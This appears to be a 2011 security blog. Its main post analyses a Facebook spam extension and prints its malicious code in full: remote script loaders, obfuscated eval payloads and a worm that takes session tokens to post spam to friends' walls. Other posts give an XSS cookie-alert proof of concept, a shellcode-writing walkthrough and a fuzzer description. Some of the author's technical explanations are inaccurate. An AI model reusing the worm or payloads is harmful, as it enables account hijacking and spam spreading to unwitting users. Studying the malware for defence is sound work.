Monday, December 19, 2011

The truth behind "Yeah!! It happens on television!!"(A Facebook Spam)

Facebook spamming is increasing day by day and these days its becoming home for spammers.Latest one is a video spam titled [Video] Yeah!! It happens on television posing some funny pornographic content to attract the users of Facebook.In this article I am going to reveal how this spam/virus (whatever you say) works and how can you protect yourself from this.


Warning:I did this inside a security sandbox.If you want to do the same experiment,I request you to do inside a security sandbox.Before doing this clear all your browser data(Cookies,Cache etc etc.).

So the attack scenario is like this:
You saw one of your friends status like,

It can happen to anyone! I dare you can watch this.

Lol Checkout this video its very embracing moment for Her.

blah..
blah..
blah..



Once you click on the malicious link,Sometime it may ask you to share it with your friends before you can watch. Here lies the first trap.

Once you share it,it will take you to following web page:
It may vary but in my case it was hwuheuwhewew.blogspot.com

When the page will fully load the you get a message "Divx Missing Plugin".


When you click on "Install plugin" button you will be asked to download a plugin before you can watch the video. The plugin is "youtube premium plugin".(The main virus)




As you install the extension the video will automatically shared on your wall and will get notified to all of the friends in your profile.

So if we look at the source code of that page or using firebug,we can see many lines of code but only following is very important.

<iframe allowtransparency='true' frameborder='0' height='305' id='player_iframe' name='player_iframe' scrolling='no' src='http://failvids.net/yt/plugin.html' width='577'></iframe>



From this its clear that the its loading the link 'http://failvids.net/yt/plugin.html' inside an iframe.

So opening that link http://failvids.net/yt/plugin.html main browser i found some interesting lines of code.




<center><span style="font-size:30px;font-weight:bold;text-decoration:underline;">Divx-Plugin Missing</span></center>

                <ol>
                You do not have the plugin required to view the video<br><br>
                    <li>Install Youtube Premium plugin<br><br><a onclick="instalar();" class="install nomargin"></a></li>
                    <li>Then Reload this page by pressing F5</li>
                </ol>

From this above code we can see when a user clicks on [Install Plugin] button that will trigger JavaScript Event onclick() and as a result the JS finction installer() will be called.

Now if you go little but up side of the source code of the page you can see following lines of code.


<script>
                var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
                var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
                function instalar(){
if (is_chrome){
                        window.open("http://failvids.net/yt/youtube.crx");
                    } 
                     else if(is_firefox){
                        var params = {
                            "Youtube Extension": {
                                URL: "http://failvids.net/yt/youtube.xpi",
                                toString: function () { return this.URL; }
                            }
                        };
                        InstallTrigger.install(params);
                    } else{
                         window.open("http://failvids.net/yt/video.php");
                    }
                }
if(!is_chrome && !is_firefox )
                window.location="http://failvids.net/yt/video.php";
            </script>


From this code we can see the JavaScript Code is trying to identify the users browser using "navigator.userAgent."

After that we have got our function installer()as i have mentioned earlier.
Inside this function you can see its checking if the users browser is chrome then it will take the user to "http://failvids.net/yt/youtube.crx"

And if the browser is Firefox it will take the user to this url. "http://failvids.net/yt/youtube.xpi"

Now do you know what is .xpi and .crx file.??

Well An XPI file is a Mozilla/Firefox Browser Extension Archive file. and .CRX file is Chrome Browser Extension Archive file.

Whatever Firefox add on or chrome extension you use it comes in .xpi or .crx package.If you open that file in the same browser you will not be able to understand.You will just get a window like this.


My next target was to download those extension package files to know the functionality .But the main problem when downloading Browser Extension main package file is,you cannot download it in the same browser.And you should not try because its very risky.
If any attacker somehow bypassed the the browser security then the Add -one will be installed without your permission.(Its not new in Internet History!)

So its better to use any download manager.After downloading those files i have decided to break the .crx file which is for Google chrome.

Breaking .CRX file.

Unpacking the .crx file of .xpi file is not a big deal.Just rename the youtube.crx file to youtube.rar and unpack it using winrar.

So after unpacking that file i found follwing files

1) Chrome.mainfest
2) go.js
3) mainfest.jsom
4) And some icons.




The main code for this malicious extension file is in "go.js" file.
Source of "go.js" is like :

loadScript_you();
function loadScript_you() {
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://failvids.net/yt/script.js");
var head=document.getElementsByTagName("head")[0];
if( head==null) return false;
head.appendChild(s);
return true;
}

From this we can see its fetching remote scripts from location

http://failvids.net/yt/script.js

I tried to access http://failvids.net/yt/script.js and found following lines of code.The server was very slow but after waiting 4-5 min i got this.

function addScript() {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
s.setAttribute("src", "http://failvids.net/yt/extra.js");
var a = document.getElementsByTagName('script')[0];
if (a == null) return false;
a.appendChild(s);
return true
}
addScript();

You can see the function "addScript()" is also fetching an external JavaScript file

http://failvids.net/yt/extra.js

The main code was in "extra.js" file and it looks like this.

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,101,110,99,104,117,108,97,116,117,70,66,40,41,32,123,10,32,32,32,32,118,97,114,32,105,102,114,97,59,10,32,32,32,32,105,102,32,40,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,57,56,102,98,118,105,100,101,111,47,103,105,41,32,124,124,32,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,57,56,102,98,118,105,100,101,111,47,103,105,41,41,32,123,10,32,32,32,32,32,32,32,32,105,102,114,97,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,108,105,102,114,97,109,101,39,41,10,32,32,32,32,32,32,32,32,105,102,32,40,105,102,114,97,32,33,61,32,110,117,108,108,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,105,102,114,97,46,105,110,110,101,114,72,84,77,76,32,61,32,39,60,105,102,114,97,109,101,32,105,100,61,34,99,104,97,110,103,101,34,32,119,105,100,116,104,61,34,53,48,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,102,97,105,108,118,105,100,115,46,110,101,116,47,121,116,47,118,105,100,101,111,46,112,104,112,34,32,104,101,105,103,104,116,61,34,51,48,48,34,32,115,99,114,111,108,108,105,110,103,61,34,110,111,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62,39,10,32,32,32,32,32,32,32,32,125,59,10,32,32,32,32,125,32,101,108,115,101,32,105,102,32,40,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,98,108,111,103,115,112,111,116,47,105,41,41,32,123,10,32,32,32,32,32,32,32,32,105,102,114,97,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,108,105,102,114,97,109,101,39,41,10,32,32,32,32,32,32,32,32,105,102,32,40,105,102,114,97,32,33,61,32,110,117,108,108,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,115,101,108,102,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,102,97,105,108,118,105,100,115,46,110,101,116,47,121,116,47,118,105,100,101,111,46,112,104,112,34,59,10,32,32,32,32,32,32,32,32,125,59,10,32,32,32,32,125,10,32,32,32,10,125,10,101,110,99,104,117,108,97,116,117,70,66,40,41,59))

eval(function (p, a, c, k, e, r) {
    e = function (c) {
        return c.toString(a)
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function (e) {
            return r[e]
        }];
        e = function () {
            return '\\w+'
        };
        c = 1
    };
    while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('e 4(){1 a=2.8(\'c\')[0];6(a==7)3 9;1 b=2.d("5");b.f="g://h.i.j/k/l.m";b.n="0";b.o="0";b.p="0";a.q(b);3 r}4();', 28, 28, '|var|document|return|load|img|if|null|getElementsByTagName|false|||body|createElement|function|src|http|whos|amung|us|swidget|acgflhphtsib|gif|width|height|border|appendChild|true'.split('|'), 0, {})) //eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('40="20";8(41.31.46(/^5:\\/\\/(9\\.)?45\\.14/47)){6 3=2["16"]("18");3.12="5://43.3.11/23/44.23.24";3.22="25/21";3.19=17(){6 15=2.35("34")[0];8(15==33)32 30;6 4=2.16("36");4.12="5://37.39.38/42/55.60";4.61="0";4.57="0";4.48="0";15.13(4);6 7=2["16"]("18");7.12="5://9.26.11/14/27.28/50.24?49="+51;7.22="25/21";7.19=17(){8(54=="20"){6 10=2.59("53");8(10==33){32 30}10.52[1].31="5://9.26.11/14/27.28/?56=58"}};2.29.13(7)};2.29.13(3)}',10,62,'||document|hashemian|ss|http|var|clcl|if|www|objobj|com|src|appendChild|cl|oo|createElement|function|script|onload|no|javascript|type|js|php|text|hardtrons|C8AA27305BBB4AD7B769656766711E4BC8AA27305BBB4AD7B769656766711E4B|asp|head|false|href|return|null|body|getElementsByTagName|img|whos|us|amung|VIH_DisplayOnPage|location|swidget|scripts|visitorIPHOST|bancoestado|match|i|border|ip|get|VIH_HostIP|children|side2|analisis|viri20111|STP|height|login|getElementById|gif|width'.split('|'),0,{}))

function readCookie(a) {
    var b = a + '=';
    var c = document['cookie']['split'](';');
    for (var d = 0; d < c['length']; d++) {
        var e = c[d];
        while (e['charAt'](0) == ' ') {
            e = e['substring'](1, e['length']);
        }
        if (e['indexOf'](b) == 0) {
            return e['substring'](b['length'], e['length']);
        }
    }
    return null;
}

function setCookie(nombre, valor, caducidad) {
    var expireDate = new Date()
    expireDate.setDate(expireDate.getDate() + caducidad);
    document.cookie = nombre + "=" + escape(valor) + "; expires=" + expireDate.toGMTString() + "; path=/";
}

function getRandomInt(a, b) {
    return Math['floor'](Math['random']() * (b - a + 1)) + a
}

function randomValue(a) {
    return a[getRandomInt(0, a['length'] - 1)]
}

function fb_comparte() {
    var user_id = readCookie('c_user');
    var uid = user_id;
    if (document['getElementsByName']('post_form_id')[0] == null || document['getElementsByName']('fb_dtsg')[0] == null) return false;
    var post_form_id = document['getElementsByName']('post_form_id')[0]['value'];
    var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
    var video_url = ['http://anuerherhee.blogspot.com/','http://doocjhjsuher.blogspot.com/'];
    var domains = ['http://i.imgur.com/b6eRh.jpg'];
    var p0 = ['check this out ... cool ',' This cool ...', 'I like it ..'];
    var p1 = ['check this out ... cool ',' Ehey ',' Hey ',' Hey! ',' about ',' Hello! ',' Look! ',' That last ',' Amazing!'];
    var p2 = ['u wont believe! ',' check the sad post ',' haha can happen to anyone!'];
    var p3 = [' I dare you can watch this . '];
    var message = '';
    var a;
    gf = new XMLHttpRequest();
    gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=' + uid + '&' + Math['random'](), false);
    gf['send']();
    if (gf['readyState'] != 4) {} else {
        data = eval('(' + gf['responseText']['substr'](9) + ')');
        if (data['error']) {
            return false;
        } else {
            a = data;
        }
    }
    var b = a['payload']['entries']['length'];
    if (b > 30) {
        b = 30
    };
    var cook = readCookie("fb_videobor_" + user_id);
    if (cook == "activo") return false;
    message = [randomValue(p1), randomValue(p2), randomValue(p3)]['join'](' ');
    var c = new XMLHttpRequest();
    var d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
    var title = '[VIDEO] Yeahh!! It happens on Live Television!';
    var summary = 'Lol Checkout this video its very embracing moments for her';
    var imagen = 'http://i.imgur.com/b6eRh.jpg';
    var e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + user_id + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][v]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
    c['open']('POST', d, true);
    c['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    c['setRequestHeader']('Content-length', e['length']);
    c['setRequestHeader']('Connection', 'keep-alive');
    c['onreadystatechange'] = function () {};
    c['send'](e);
    for (var f = 0; f < b; f++) {
        if (a['payload']['entries'][f]['uid'] != user_id) {
            message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
            var g = new XMLHttpRequest();
            d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
            title = '[VIDEO] Yeahh!! It happens on Live Television!';
            summary = 'Lol Checkout this video its very embracing moment for her';
            imagen = 'http://i.imgur.com/b6eRh.jpg';
            e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
            g['open']('POST', d, true);
            g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
            g['setRequestHeader']('Content-length', e['length']);
            g['setRequestHeader']('Connection', 'keep-alive');
            g['onreadystatechange'] = function () {};
            g['send'](e);
        }
    }
    setCookie("fb_videobor" + user_id, "activo", 300);
    return true;
}

function FBFBFB321() {
    if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
        var cook = readCookie("fb_videobor_");
        if (cook == "activo") {
            return false;
        }
        var user_id = readCookie('c_user');
        if (user_id == null) return false;
        cook = readCookie("fb_videobor_" + user_id);
        if (cook == "activo") {
            return false;
        }
        setTimeout(function () {
            fb_comparte();
        }, 2000);
        return true;
    }
    return false;
}
FBFBFB321();

From the code we can see that its first its calling the function FBFBFB321();.This fucntion is responsible for faebook cookie Hijacking.

From the function we can see that its checking the url location.
Note: if its http://facebook.com or https://.Then grab the cookie from browser.
As Facebook cookie is always marked as secure then client side java scripts will not be able to read those cookies.so the user is safe.

After that we can see its calling the function function fb_comparte().This function is responsible for generating random fake plugin comments.You can see from the code that its using Ajax request to http://www.facebook.com/ajax/profile/composer.php.
Well this is the main evil fucntion.Analyzing that function i found that first its reading the user cookie c_user.the c_user cookie is nothing but the id of your Facebook profile.

Now the most critical feature of this virus is user tracking feature.
If you look at the function readCookie() you can see it randomly adds cookie to your browser and track your activity on internet.

How to prevent this spam!
Don’t ever click on the link given with this content.

Don’t share the content

Unfortunately if you have followed the steps asked by the spammers then remove the extension that they have asked to install. “Youtube extension”

How to Remove Add Ons and Extension

http://support.google.com/chrome/bin/answer.py?hl=en&answer=113907

http://kb.mozillazine.org/Uninstalling_extensions



There are many more stuffs,Right now its not possible for me to explain the entire code.I hope It will help you!Feel free to drop comments.Thanks.

Sunday, November 20, 2011

rtspFUZZ a Real Time Streaming Server Fuzzer

The Real Time Streaming Protocol (RTSP) is a network control protocol designed for use in entertainment and communications systems to control streaming.The Real Time Streaming Protocol, or RTSP, is an application-level protocol for control over the delivery of data with real-time properties. RTSP provides an extensible framework to enable controlled, on-demand delivery of real-time data, such as audio and video.

rtspFUZZ is a Real Time Streaming Protocol Server Fuzzer(a python script near about 600 lines)coded by myself.
This fuzzer uses 6 basic crafting and 9 advanced crafting technique to test any target application.

Key Features:
1)This fuzzer uses 6 basic crafting technique with OPTIONS,DESCRIBE,SETUP,PLAY,GET_PARAMETER,TEARDOWN,PAUSE etc rtsp commands and 9 advanced crafting technique to test any target application.
2)Ability to fuzz with Metasploit Pattern (pattern_create.rb) can be helpful to find offset.

How to use??
1)First edit "rtsp.conf" file with your favorite text editor.Change the Parameters as per your requirement.You should get parameters description in the configuration file.
2)Give Write permission to LOG.TXT (chmod 777 README.TXT)
3)Give execution permission to "rtspfuzz.py" file.(chmod 777 rtspfuzz.py)
4)In shell type "python rtspfuzz.py".Now the script will show your preferences provided in the configuration file.If the information are correct then press enter to start fuzzing.
5)The program will always save the last successful request in LOG.TXT file.When the target crashes go to LOG.TXT file to check the Buffer length and the exact request sent.

Some sample wire-shark captures:






Download:

The tool can be downloaded from:

http://packetstormsecurity.org/files/author/9123/

XSS through javascript injection in Speed-Bit Search Engine

There is a XSS through JavaScript Injection vulnerability in the Home page of Speed Bit Search Engine.

http://search.speedbit.com/

In Media:
The Hackers News:
http://www.thehackernews.com/2011/11/cross-site-scripting-vulnerability-in.html
Softpedia News:
http://news.softpedia.com/news/Indian-Hacker-Finds-Vulnerability-in-Speed-Bit-Search-Engine-233645.shtml

Technical Description of this Issue:
The XXS filter is filtering normal html /script /iframe tags but XXS can be achieved by injecting JavaScript event "onmouseover()".

Proof of concept:
To exploit this vulnerabilty follwthis steps:

1) Visit this URL

http://search.speedbit.com/?aff=grbr" onmousemove="alert(document.cookie)



2) Bring mouse cursor over the hyperlink shown in the attached POC! and you should see a POP up box showing the browser cookies.


The search engine might not be as popular as Google, but a large number of users could be affected if a black hat would profit from the flaw.

Monday, October 31, 2011

Getting into a symbian mobile device using Python.(Bluetoothinteractive console using pyS60)

Like any other computing device, playing with mobile devices is always a great fun for me.
It’s almost 5-6 year’s I've been playing around with series 60 mobile devices. Previously i was using Nokia N72.
Nokia N72 has built in Symbian 2nd Edition operating system in it.
py
For last 5-6 months i am using Nokia C6-00.and believe me, It’s really a great piece of technology.
It has built in Symbian OS v9.4, Series 60 rel. 5.So it just really rocksssss.

Now lets come to the point. If you are using any series 60 device => v2.And if you are lazy enough( like me :P :P :P like Sit python, Stand Python Eat Python, Sleep python)
Then there is good news for you. Like your Linux/Windows PCs you can also run python script on your series 60 device to automate job you want. Not only automation
you can even write fully featured GUI application using for your series 60 device.


In this article i am not going to teach you how to write python script for your series 60 devices, bcoz if you already know python, there is nothing new in it.

Here i will tell you how you can execute "python shell command" on your series 60 device from your PC via Bluetooth.

So to do this you must have following things.. :P :P

1>A series S60 device With PyS60 installed in it (I will tell you how to get PyS60 later on)
2>A PC with Bluetooth connectivity.


Getting Python interpreter for your Series 60 Device:
In this link you will get all version of Pys60.Choose whatever version you want depending upon your Series 60 version.
[python]
http://www.python.org/getit/other/
https://garage.maemo.org/frs/?group_id=854
[/python]
Preparing your PC to receive python reverse shell form the mobile device:
I am assuming that you already have a working Bluetooth device attached to your PC with all the Device drivers installed.
To test if your Bluetooth device is working or not i suggest to transfer anything between your PC and Mobile Device.
And also find that both devices are discoverable.

Now go to control panel
Select Phones and Modem Option


Go to Modems Tab
Select the modem you are going to USE.



Here you will get the virtual com port through which your PC will be communicating with your Series 60 device.
In this case I will be using COM5.


Now go to start -- > Accessories --> Communications --> Hyper Terminal

Now Hyper Terminal widow should open up.



Now go to File -- > Properties



Now Select the COM port. Here I will select COM5.


Now save this setting by pressing OK
Now go to 'call" Tab and select Wait for a Call.



Now you have to enter the connection Name. Enter whatever you want and press OK.



If everything is fine you should see "Connected" and a timer in the Lower Left corner of the Hyper Terminal window.



By doing this you have successfully configured you PC to accept connection form your series 60 device.

Now in your Series 60 Device

Go to Menu open up Python.In my case i will be using Python 1.9.7.



If python is successfully installed you should get following window.



Now Go to Options and Select "Bluetooth Console".



Now you have to search for your PC and selcet your PC form the Device List.



After selecting your PC from the list if everything configured well you should see the following in your series 60 Device.



And in the Hyper Terminal Window you should get the Python Shell of your series S60 device.



BINGO!!!
Now you can execute whatever python shell command you want in your S60 device just entering the command in the hyperlink window.
Now to test the connection type these lines in Hyper Terminal:
import audio
audio.say("Hello")
If every thing is fine you should hear a voice from your phone saying "Helloooo!!!"

Thursday, October 27, 2011

ARWIN Source Code

#include <windows.h>
#include <stdio.h>

/***************************************
arwin - win32 address resolution program
by steve hanna v.01
vividmachines.com
shanna@uiuc.edu
you are free to modify this code
but please attribute me if you
change the code. bugfixes & additions
are welcome please email me!
to compile:
you will need a win32 compiler with
the win32 SDK

this program finds the absolute address
of a function in a specified DLL.
happy shellcoding!
***************************************/


int main(int argc, char** argv)
{
HMODULE hmod_libname;
FARPROC fprc_func;

printf("arwin - win32 address resolution program - by steve hanna - v.01\n");
if(argc < 3)
{
printf("%s <Library Name> <Function Name>\n",argv[0]);
exit(-1);
}

hmod_libname = LoadLibrary(argv[1]);
if(hmod_libname == NULL)
{
printf("Error: could not load library!\n");
exit(-1);
}
fprc_func = GetProcAddress(hmod_libname,argv[2]);

if(fprc_func == NULL)
{
printf("Error: could find the function in the library!\n");
exit(-1);
}
printf("%s is located at 0x%08x in %s\n",argv[2],(unsigned int)fprc_func,argv[1]);


}

Beep Beep Shell Code

If this shell code is injected into any process,a Beep sound will occur with an interval of 20 seconds.
This shell code is hard coded for Windows XP.Gonna work fine with all service packs of XP,but due to "ASLR" in Vista or Win-7 it will not work.

Basically i have used 2 built in functions in windows.
1)Beep
2)Sleep

These two functions are defined in "Kernel32.dll"
Like always i will use ARWIN to get the virtual address of the above mentioned function in Kernel32.dll

D:\exploitkit\arwin>arwin kernel32.dll Beep
arwin – win32 address resolution program – by steve hanna – v.01
Beep is located at 0x7c837aa7 in kernel32.dll

D:\exploitkit\arwin>arwin kernel32.dll Sleep
arwin – win32 address resolution program – by steve hanna – v.01
Sleep is located at 0x7c802446 in kernel32.dll


From above we can see virtual address of these two functions are 0x7c837aa7(Beep) and 0x7c802446 (Sleep)
From MSDN we can see that "Beep" function accepts two arguments Frequency and duration of the Beep.
BOOL WINAPI Beep(
__in  DWORD dwFreq,
__in  DWORD dwDuration
);

and Sleep function accepts one argument that is only Duration of the beep.
VOID WINAPI Sleep(
__in  DWORD dwMilliseconds
);

The assembly code will be like following..

;sleep.asm
[SECTION .text]

global _start


_start:
mov ecx,5                   ; Loop
loop:
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx



mov eax, 0x7c837aa7 ;address of Beep
mov bx, 750         ;Frequency
mov dx, 50     ;Duration 
push ebx
push edx
call eax     ;Call Beep

xor eax,eax
xor ebx,ebx
mov ebx, 0x7c802446 ;address of Sleep
mov ax, 20000       ;pause for 20 Seconds
push eax
call ebx            ;

dec ecx
jnz loop

Next step is to assemble the above code with NASM assembler.

D:\exploitkit\nasm>nasm -f elf Beep.asm
D:\exploitkit\>ld.exe -o Beep Beep.o


Then we will get an object file that is Beep.o

From that object file will get Mnemonics of the Instructions.
The objdump out put will be like this..

D:\exploitkit>objdump -d Beep.o

Beep.o:     file format elf32-i386

Disassembly of section .text:

00000000 <_start>:
0:   b9 05 00 00 00          mov    $0x5,%ecx

00000005 <loop>:
5:   31 c0                   xor    %eax,%eax
7:   31 db                   xor    %ebx,%ebx
9:   31 c9                   xor    %ecx,%ecx
b:   31 d2                   xor    %edx,%edx
d:   b8 a7 7a 83 7c          mov    $0x7c837aa7,%eax
12:   66 bb ee 02             mov    $0x2ee,%bx
16:   66 ba 32 00             mov    $0x32,%dx
1a:   53                      push   %ebx
1b:   52                      push   %edx
1c:   ff d0                   call   *%eax
1e:   31 c0                   xor    %eax,%eax
20:   31 db                   xor    %ebx,%ebx
22:   bb 46 24 80 7c          mov    $0x7c802446,%ebx
27:   66 b8 e8 03             mov    $0x3e8,%ax
2b:   50                      push   %eax
2c:   ff d3                   call   *%ebx
2e:   49                      dec    %ecx
2f:   75 d4                   jne    5 <loop>
31:   31 c0                   xor    %eax,%eax
33:   b8 12 cb 81 7c          mov    $0x7c81cb12,%eax
38:   50                      push   %eax
39:   ff d0                   call   *%eax

D:\exploitkit>

So the final shell code is like ..

\x31\xc0
\x31\xdb
\x31\xc9
\x31\xd2
\xb8\xa7\x7a\x83\x7c
\x66\xbb\xee\x02
\x66\xba\x32\x00
\x53
\x52
\xff\xd0
\x31\xc0
\x31\xdb
\xbb 46\x24\x80\x7c
\x66\xb8\xe8\x03
\x50
\xff\xd3
\x49
\x75\xd4
\x31\xc0
\xb8\x12\xcb\x81\x7c
\x50
\xff\xd0

To test this shell code compile the following code with any C compiler .
/*shellcodetest.c*/

char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb8
\xa7\x7a\x83\x7c\x66\xbb\xee\x02\x66
\xba\x32\x00\x53\x52\xff\xd0\x31\xc0
\x31\xdb\xbb\x46\x24\x80\x7c\x66\xb8
\xe8\x03\x50\xff\xd3\x49\x75\xd4\x31
\xc0\xb8\x12\xcb\x81\x7c\x50\xff\xd0";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}

Again opening the executable in Immunity Debugger we can see the same code but in details..

00401000 > $ B9 05000000    MOV ECX,5
00401005   > 31C0           XOR EAX,EAX
00401007   . 31DB           XOR EBX,EBX
00401009   . 31C9           XOR ECX,ECX
0040100B   . 31D2           XOR EDX,EDX
0040100D   . B8 A77A837C    MOV EAX,kernel32.Beep
00401012   . 66:BB EE02     MOV BX,2EE
00401016   . 66:BA 3200     MOV DX,32
0040101A   . 53             PUSH EBX                                 ; /Duration
0040101B   . 52             PUSH EDX                                 ; |Frequency
0040101C   . FFD0           CALL EAX                                 ; \Beep
0040101E   . 31C0           XOR EAX,EAX
00401020   . 31DB           XOR EBX,EBX
00401022   . BB 4624807C    MOV EBX,kernel32.Sleep
00401027   . 66:B8 E803     MOV AX,3E8
0040102B   . 50             PUSH EAX                                 ; /Timeout
0040102C   . FFD3           CALL EBX                                 ; \Sleep
0040102E   . 49             DEC ECX
0040102F   .^75 D4          JNZ SHORT Beep.00401005


Thursday, October 20, 2011

Compile and execute C code everywhere!!

The Tiny C Compiler (aka TCC, tCc, or TinyCC) is an x86 and x86-64 C compiler created by Fabrice Bellard. It is designed to work for slow computers with little disk space (e.g. on rescue disks). Windows operating system support has been added in version 0.9.23 (17 Jun 2005). TCC is distributed under the GNU Lesser General Public License (LGPL).

Features:

Its small file size (about 100 KB for the x86 TCC executable) and memory footprint allow it to be used directly from a single 1.44 M floppy disk, such as a rescue disk.
TCC is intended to produce native x86 and x86-64 code very quickly; according to Bellard, it compiles, assembles and links the Links web browser about 9 times faster than GCC does.[1]
TCC has a number of compiler-specific language features intended to improve its practicality, such as an optional memory and bound checker, for improved code stability.
TCC allows programs to be run automatically at compile time using a command-line switch. This allows programs to be run as a shell script under Unix-like systems which support the shebang interpreter directive syntax.

usage:

tcc [options] [infile1 infile2…] [‘-run’ infile args…]

Compile ‘a.c’ and execute it directly :

tcc -run a.c arg1

Compile a.c and execute it directly. arg1 is given as first argument to the main() of a.c.

tcc a.c -run b.c arg1

Compile ‘a.c’ and ‘b.c’, link them together and execute them. arg1 is given as first argument to the main() of the resulting program.

tcc -o myprog a.c b.c

Compile ‘a.c’ and ‘b.c’, link them and generate the executable ‘myprog’.

tcc -o myprog a.o b.o

link ‘a.o’ and ‘b.o’ together and generate the executable ‘myprog’.
tcc -c a.c

Compile ‘a.c’ and generate object file ‘a.o’.
tcc -c asmfile.S

Preprocess with C preprocess and assemble ‘asmfile.S’ and generate object file ‘asmfile.o’.
tcc -c asmfile.s

Assemble (but not preprocess) ‘asmfile.s’ and generate object file ‘asmfile.o’.

tcc -r -o ab.o a.c b.c

Compile ‘a.c’ and ‘b.c’, link them together and generate the object file ‘ab.o’.

Scripting:

TCC can be invoked from scripts, just as shell scripts. You just need to add #!/usr/local/bin/tcc -run at the start of your C source:

#!/usr/local/bin/tcc -run
#include <stdio.h>

int main() 
{
printf("Hello World\n");
return 0;
}
TCC can read C source code from standard input when ‘-’ is used in place of ‘infile’. Example:

echo 'main(){puts("hello");}' | tcc -run -


Wiki:

http://en.wikipedia.org/wiki/Tiny_C_Compiler


Download Link:

http://bellard.org/tcc/

Monday, October 17, 2011

Encoding your handmade shell code using Metasploit Encoder

Encoding of shell code is important in real time exploitation b'coz,when you create a shell code that shell code may contain some bad characters,null bytes.Either the transmission protocol, or the end application
can be sensitive to "bad characters" which can break your shellcode in various ways.
Bad characters can mostly be eliminated by encoding the payload.

If you are using shell code present in Metasploit framework,then you dont have to concentrate on shell code encoding.Metasploit by default encode the shell code when you are using in the exploitation.
But in many situation when you are using your own shell code in exploits then the shell code must be bad character free.
So to do that you can use Metasploit to encode your handmade shellcode.

To get a list of all encoders present in metasploit framework by running the ./msfencode -l command.
root@bt:~#./msfencode -l -a x86 

